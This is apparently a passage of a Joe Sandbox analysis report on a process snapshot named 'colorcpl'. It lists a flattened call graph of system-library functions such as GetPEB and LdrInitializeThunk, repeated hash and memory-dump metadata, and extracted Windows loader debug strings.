6e81d07 GetPEB 19172->19174 19188 6e3a2cd 19172->19188 19173->19174 19175 6e81d1a 19174->19175 19174->19188 19177 6e37d50 GetPEB 19175->19177 19176 6e37d50 GetPEB 19178 6e3a2d2 19176->19178 19179 6e81d1f 19177->19179 19180 6e81d51 GetPEB 19178->19180 19181 6e3a2df 19178->19181 19182 6e81d32 19179->19182 19183 6e81d23 GetPEB 19179->19183 19180->19181 19185 6e37d50 GetPEB 19181->19185 19187 6e3a2ea 19181->19187 19184 6ed1582 12 API calls 19182->19184 19183->19182 19184->19188 19189 6e81d69 19185->19189 19186 6e3a2fb 19186->18865 19187->19150 19187->19186 19188->19176 19190 6e81d7c 19189->19190 19191 6e81d6d GetPEB 19189->19191 19192 6ed1582 12 API calls 19190->19192 19191->19190 19192->19187 19194 6e3a337 19193->19194 19197 6e3a42d 19193->19197 19196 6e399bf 72 API calls 19194->19196 19194->19197 19243 6e3a3c6 19194->19243 19195 6e3a830 32 API calls 19323 6e3a3bd 19195->19323 19198 6e3a37f 19196->19198 19199 6e3a620 19197->19199 19212 6e3a440 19197->19212 19200 6e3a396 19198->19200 19201 6e3a3f8 19198->19201 19202 6e3a62d 19199->19202 19206 6e81e6c GetPEB 19199->19206 19204 6e3a830 32 API calls 19200->19204 19201->19197 19211 6e19373 28 API calls 19201->19211 19210 6e3a65b 19202->19210 19216 6e81eca 19202->19216 19203 6e3a4e5 19209 6e820c2 GetPEB 19203->19209 19264 6e3a4ed 19203->19264 19205 6e3a39e 19204->19205 19205->19323 19332 6e4abd8 19205->19332 19207 6e81e78 GetPEB 19206->19207 19208 6e81e95 19206->19208 19213 6e1b150 _vswprintf_s 12 API calls 19207->19213 19214 6e1b150 _vswprintf_s 12 API calls 19208->19214 19218 6e820d5 GetPEB 19209->19218 19215 6e4174b 13 API calls 19210->19215 19211->19197 19212->19203 19212->19216 19223 6e4174b 13 API calls 19212->19223 19241 6e3a4fb 19212->19241 19212->19243 19217 6e81e92 19213->19217 19214->19217 19220 6e3a66e 19215->19220 19221 6e82240 GetPEB 19216->19221 19216->19243 19224 6e1b150 _vswprintf_s 12 API calls 19217->19224 19222 6e820ea 19218->19222 19218->19241 19225 6e3a676 19220->19225 19226 6e81ede 19220->19226 19228 
6e82269 19221->19228 19229 6e8224c GetPEB 19221->19229 19231 6ed14fb 14 API calls 19222->19231 19232 6e3a4d8 19223->19232 19233 6e81eaa 19224->19233 19234 6e37d50 GetPEB 19225->19234 19240 6e3b73d 32 API calls 19226->19240 19226->19243 19227 6e3a594 19230 6e3b73d 32 API calls 19227->19230 19236 6e1b150 _vswprintf_s 12 API calls 19228->19236 19235 6e1b150 _vswprintf_s 12 API calls 19229->19235 19237 6e3a5b2 19230->19237 19231->19241 19232->19226 19238 6e3a4e0 19232->19238 19233->19202 19249 6ed2073 28 API calls 19233->19249 19239 6e3a67b 19234->19239 19245 6e82266 19235->19245 19236->19245 19246 6e3a830 32 API calls 19237->19246 19247 6e37d50 GetPEB 19238->19247 19250 6e81f11 GetPEB 19239->19250 19251 6e3a688 19239->19251 19240->19243 19241->19227 19242 6e3a55f 19241->19242 19248 6e82109 GetPEB 19241->19248 19244 6e82162 19242->19244 19254 6e3a584 19242->19254 19243->19195 19261 6eda80d 28 API calls 19244->19261 19255 6e1b150 _vswprintf_s 12 API calls 19245->19255 19256 6e3a5c1 19246->19256 19247->19203 19257 6e82131 19248->19257 19258 6e82114 GetPEB 19248->19258 19249->19202 19253 6e81f24 GetPEB 19250->19253 19252 6e3a693 19251->19252 19251->19253 19337 6e19373 19252->19337 19253->19252 19260 6e81f37 19253->19260 19259 6e3a830 32 API calls 19254->19259 19262 6e8227e 19255->19262 19263 6e37d50 GetPEB 19256->19263 19266 6e1b150 _vswprintf_s 12 API calls 19257->19266 19265 6e1b150 _vswprintf_s 12 API calls 19258->19265 19259->19227 19358 6ed14fb 19260->19358 19261->19227 19262->19243 19272 6ed2073 28 API calls 19262->19272 19269 6e3a5c6 19263->19269 19264->19218 19264->19241 19270 6e8212e 19265->19270 19266->19270 19273 6e3a5d3 19269->19273 19274 6e821a0 GetPEB 19269->19274 19275 6e1b150 _vswprintf_s 12 API calls 19270->19275 19272->19243 19278 6e821b3 GetPEB 19273->19278 19279 6e3a5de 19273->19279 19274->19278 19276 6e82146 19275->19276 19276->19242 19283 6ed2073 28 API calls 19276->19283 19278->19279 19281 6e821c8 19278->19281 19280 6e37d50 GetPEB 19279->19280 19284 
6e3a5e3 19280->19284 19282 6e37d50 GetPEB 19281->19282 19285 6e821cd 19282->19285 19283->19242 19287 6e3a5f0 19284->19287 19288 6e82201 GetPEB 19284->19288 19289 6e821e0 19285->19289 19290 6e821d1 GetPEB 19285->19290 19286 6e3a77d 19291 6e37d50 GetPEB 19286->19291 19298 6e37d50 GetPEB 19287->19298 19287->19323 19288->19287 19294 6ed1411 12 API calls 19289->19294 19290->19289 19293 6e3a787 19291->19293 19295 6e81fea GetPEB 19293->19295 19296 6e3a78f 19293->19296 19294->19279 19300 6e81ffd GetPEB 19295->19300 19296->19300 19327 6e3a79a 19296->19327 19297 6e81f56 GetPEB 19301 6e81f7e 19297->19301 19302 6e81f61 GetPEB 19297->19302 19303 6e82219 19298->19303 19299 6e3a76d 19305 6e3a830 32 API calls 19299->19305 19309 6e82012 19300->19309 19300->19327 19310 6e1b150 _vswprintf_s 12 API calls 19301->19310 19308 6e1b150 _vswprintf_s 12 API calls 19302->19308 19303->19216 19313 6e82075 19303->19313 19304 6e81faf 19306 6eda80d 28 API calls 19304->19306 19305->19286 19306->19286 19307 6e37d50 GetPEB 19312 6e81f7b 19308->19312 19310->19312 19319 6e1b150 _vswprintf_s 12 API calls 19312->19319 19317 6ed1411 12 API calls 19313->19317 19317->19323 19322 6e81f93 19319->19322 19324 6e3a74e 19322->19324 19326 6ed2073 28 API calls 19322->19326 19323->18854 19324->19299 19324->19304 19326->19324 19327->19307 19331->19149 19334 6e4abf1 19332->19334 19333 6e4ac5f 19333->19323 19334->19333 19335 6ecfa2b 28 API calls 19334->19335 19370 6e4ac7b 19334->19370 19335->19334 19338 6e737ee 19337->19338 19339 6e1938f 19337->19339 19340 6eda80d 28 API calls 19338->19340 19339->19338 19341 6e19397 19339->19341 19343 6e193ab 19340->19343 19345 6e193c3 19341->19345 19427 6e193cc 19341->19427 19344 6eda80d 28 API calls 19343->19344 19343->19345 19344->19345 19346 6e19819 19345->19346 19347 6e19829 19346->19347 19356 6e1984c 19346->19356 19348 6e3b8e4 30 API calls 19347->19348 19349 6e1982e 19348->19349 19350 6e19839 19349->19350 19351 6e73bbe 19349->19351 19431 6e1988d 19350->19431 19353 6eda80d 28 API 
calls 19351->19353 19352 6e1987b 19352->19286 19352->19297 19352->19324 19353->19356 19354 6eda80d 28 API calls 19357 6e73be4 19354->19357 19356->19352 19356->19354 19357->19357 19359 6ed1520 _vswprintf_s 19358->19359 19360 6e37d50 GetPEB 19359->19360 19361 6ed1543 19360->19361 19362 6ed1557 _vswprintf_s 19361->19362 19363 6ed1547 GetPEB 19361->19363 19364 6e5b640 _vswprintf_s 12 API calls 19362->19364 19363->19362 19365 6ed157c 19364->19365 19365->19252 19371 6e4aca2 19370->19371 19373 6e4ad10 19370->19373 19396 6e4acda 19371->19396 19415 6e596e0 LdrInitializeThunk 19371->19415 19375 6e4ad1e GetPEB 19373->19375 19416 6ec3c60 19373->19416 19376 6e4ad2c 19375->19376 19377 6e8a092 19375->19377 19381 6e4ad3c 19376->19381 19386 6e89fa0 GetPEB 19376->19386 19379 6e8a0ba 19377->19379 19380 6e8a09d GetPEB 19377->19380 19384 6e1b150 _vswprintf_s 12 API calls 19379->19384 19383 6e1b150 _vswprintf_s 12 API calls 19380->19383 19388 6e4ad47 GetPEB 19381->19388 19389 6e89fb3 GetPEB 19381->19389 19387 6e8a0b7 19383->19387 19384->19387 19385 6e89f90 19385->19375 19386->19381 19392 6e1b150 _vswprintf_s 12 API calls 19387->19392 19390 6e89fda 19388->19390 19391 6e4ad73 19388->19391 19389->19388 19393 6e89fc6 19389->19393 19390->19391 19395 6e89fe3 GetPEB 19390->19395 19398 6e4ad7e GetPEB 19391->19398 19399 6e89ff6 GetPEB 19391->19399 19392->19396 19394 6ed14fb 14 API calls 19393->19394 19397 6e89fd5 19394->19397 19395->19391 19396->19334 19397->19388 19401 6e4ad94 19398->19401 19402 6e8a042 19398->19402 19399->19398 19400 6e8a009 19399->19400 19403 6e37d50 GetPEB 19400->19403 19401->19396 19408 6e37d50 GetPEB 19401->19408 19402->19401 19404 6e8a04b GetPEB 19402->19404 19405 6e8a00e 19403->19405 19404->19401 19406 6e8a021 19405->19406 19407 6e8a012 GetPEB 19405->19407 19410 6ed1411 12 API calls 19406->19410 19407->19406 19409 6e8a063 19408->19409 19411 6e8a076 19409->19411 19412 6e8a067 GetPEB 19409->19412 19413 6e8a03d 19410->19413 19414 6ed1411 12 API calls 19411->19414 
19412->19411 19413->19398 19414->19377 19415->19373 19417 6e89f74 19416->19417 19419 6ec3c78 19416->19419 19417->19375 19420 6e596e0 LdrInitializeThunk 19417->19420 19419->19417 19421 6ec3d40 19419->19421 19420->19385 19422 6ec3d7f 19421->19422 19423 6ec3e55 19422->19423 19426 6ec3e37 GetPEB 19422->19426 19424 6e5b640 _vswprintf_s 12 API calls 19423->19424 19425 6ec3e65 19424->19425 19425->19417 19426->19422 19428 6e193df 19427->19428 19429 6e193e3 19427->19429 19428->19343 19430 6e3bc04 28 API calls 19429->19430 19430->19428 19432 6e198a0 19431->19432 19433 6e198a4 19431->19433 19432->19356 19434 6e3e4a0 28 API calls 19433->19434 19434->19432 19435->18946 19436->18987 19437->18988 19438 6ed02f7 19439 6ed0323 19438->19439 19441 6ed03b0 19439->19441 19452 6ed0a28 19439->19452 19442 6ed03d1 19441->19442 19486 6edbcd2 19441->19486 19443 6ed0342 19443->19441 19456 6edbbbb 19443->19456 19446 6ed035f 19446->19441 19465 6eedfce 19446->19465 19453 6ed0a4d 19452->19453 19454 6ed0a57 19452->19454 19453->19443 19490 6e44e70 19454->19490 19457 6edbbde 19456->19457 19496 6edbd54 19457->19496 19460 6edbc3c 19460->19446 19461 6edbc3e 19510 6edaa16 19461->19510 19462 6edbc17 19500 6edf9a1 19462->19500 19468 6eedff0 19465->19468 19470 6eee19d 19465->19470 19466 6e5b640 _vswprintf_s 12 API calls 19467 6ed0388 19466->19467 19467->19441 19473 6ed03da 19467->19473 19468->19470 20196 6eee62a 19468->20196 19470->19466 19472 6eee1cd 19472->19470 20204 6eee5b6 19472->20204 19474 6edbbbb 267 API calls 19473->19474 19476 6ed0404 19474->19476 19475 6ed039a 19475->19441 19482 6eee4b3 19475->19482 19476->19475 19477 6ed058b 19476->19477 20218 6ed0150 19476->20218 19477->19475 19478 6edbcd2 256 API calls 19477->19478 19478->19475 19483 6eee4c9 19482->19483 19484 6eee5b6 12 API calls 19483->19484 19485 6eee5a7 19483->19485 19484->19485 19485->19441 19487 6edbceb 19486->19487 20224 6edae44 19487->20224 19491 6e44e94 19490->19491 19495 6e44ec0 19490->19495 19492 6e5b640 _vswprintf_s 12 API calls 
19491->19492 19493 6e44eac 19492->19493 19493->19453 19494 6ec8df1 13 API calls 19494->19491 19495->19491 19495->19494 19497 6edbc04 19496->19497 19498 6edbd63 19496->19498 19497->19460 19497->19461 19497->19462 19499 6e44e70 13 API calls 19498->19499 19499->19497 19501 6edf9d6 19500->19501 19522 6ee022c 19501->19522 19503 6edf9e1 19504 6edf9e7 19503->19504 19505 6edfa16 19503->19505 19528 6ee05ac 19503->19528 19504->19460 19508 6edfa1a _vswprintf_s 19505->19508 19544 6ee070d 19505->19544 19508->19504 19558 6ee0a13 19508->19558 19511 6edaa44 19510->19511 19517 6edaa66 19511->19517 20016 6edab54 19511->20016 19512 6e37d50 GetPEB 19514 6edab0f 19512->19514 19515 6edab23 19514->19515 19516 6edab13 GetPEB 19514->19516 19518 6edab2d GetPEB 19515->19518 19519 6edab49 19515->19519 19516->19515 19517->19512 19518->19519 19520 6edab3c 19518->19520 19519->19460 20028 6ed131b 19520->20028 19523 6ee0278 19522->19523 19527 6ee02c2 19523->19527 19566 6ee0ea5 19523->19566 19525 6ee02e9 19525->19503 19527->19525 19593 6e6cf85 19527->19593 19532 6ee05d1 19528->19532 19529 6ee06db 19529->19505 19530 6ee0652 19531 6eda854 33 API calls 19530->19531 19534 6ee0672 19531->19534 19532->19529 19532->19530 19533 6eda80d 28 API calls 19532->19533 19533->19530 19534->19529 19740 6ee1293 19534->19740 19537 6e37d50 GetPEB 19538 6ee069c 19537->19538 19539 6ee06b0 19538->19539 19540 6ee06a0 GetPEB 19538->19540 19539->19529 19541 6ee06ba GetPEB 19539->19541 19540->19539 19541->19529 19542 6ee06c9 19541->19542 19543 6ed138a 14 API calls 19542->19543 19543->19529 19545 6ee0734 19544->19545 19546 6ee07d2 19545->19546 19547 6edafde 33 API calls 19545->19547 19546->19508 19548 6ee0782 19547->19548 19549 6ee1293 33 API calls 19548->19549 19550 6ee078e 19549->19550 19551 6e37d50 GetPEB 19550->19551 19552 6ee0793 19551->19552 19553 6ee07a7 19552->19553 19554 6ee0797 GetPEB 19552->19554 19553->19546 19555 6ee07b1 GetPEB 19553->19555 19554->19553 19555->19546 19556 6ee07c0 19555->19556 19557 6ed14fb 14 API 

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 7 6e596e0-6e596ec LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 29928567a818f8ebb61c143efbc7fcf85ac4796cd0dfa12b22f0fff32d1a915f
                                                                                                • Instruction ID: 54c81d684dd6f4ae172dcd3e31cd24df3afcb28244aaf92e46c77f904dd4d7a9
                                                                                                • Opcode Fuzzy Hash: 29928567a818f8ebb61c143efbc7fcf85ac4796cd0dfa12b22f0fff32d1a915f
                                                                                                • Instruction Fuzzy Hash: 4E90027134118C02D150615B880574A00099BD0381F95D411B4534A58D8AD588917161
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 6 6e59660-6e5966c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: e3c8a723f0a78fbb579f942e704dc89153caed1f7f61127eaf794862108f0a7f
                                                                                                • Instruction ID: 3d18599e7edeec569057ac94b8b3722bfa32efa754f6f4d9f7732a12727b1883
                                                                                                • Opcode Fuzzy Hash: e3c8a723f0a78fbb579f942e704dc89153caed1f7f61127eaf794862108f0a7f
                                                                                                • Instruction Fuzzy Hash: E090027134110C02D1C0715B480564A00099BD1381FD1D015B0135A54DCE558A5977E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b9aca879180e00b39f2183def7a054aacac400ab2465b6e559ce044e4bfa9d90
                                                                                                • Instruction ID: c7fa7dbe74b6e82efc24fe0496cfa96932df9115a516c02158007a776a68c920
                                                                                                • Opcode Fuzzy Hash: b9aca879180e00b39f2183def7a054aacac400ab2465b6e559ce044e4bfa9d90
                                                                                                • Instruction Fuzzy Hash: D190027135124802D150615B880570600099BD1281F91D411B0934958D8AD588917162
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 10 6e597a0-6e597ac LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 9 6e59780-6e5978c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 8 6e59710-6e5971c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 5 6e595d0-6e595dc LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 4 6e59540-6e5954c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 17 6e59a20-6e59a2c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 16 6e59a00-6e59a0c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 13 6e598f0-6e598fc LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 12 6e59860-6e5986c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph
                                                                                                control_flow_graph 11 6e59840-6e5984c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 15 6e599a0-6e599ac LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 14 6e59910-6e5991c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 6e5967a-6e5967f 1 6e59681-6e59688 0->1 2 6e5968f-6e59696 LdrInitializeThunk 0->2
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 06ECB314
                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 06ECB484
                                                                                                • This failed because of error %Ix., xrefs: 06ECB446
                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 06ECB2DC
                                                                                                • <unknown>, xrefs: 06ECB27E, 06ECB2D1, 06ECB350, 06ECB399, 06ECB417, 06ECB48E
                                                                                                • an invalid address, %p, xrefs: 06ECB4CF
                                                                                                • The resource is owned exclusively by thread %p, xrefs: 06ECB374
                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 06ECB53F
                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 06ECB305
                                                                                                • *** then kb to get the faulting stack, xrefs: 06ECB51C
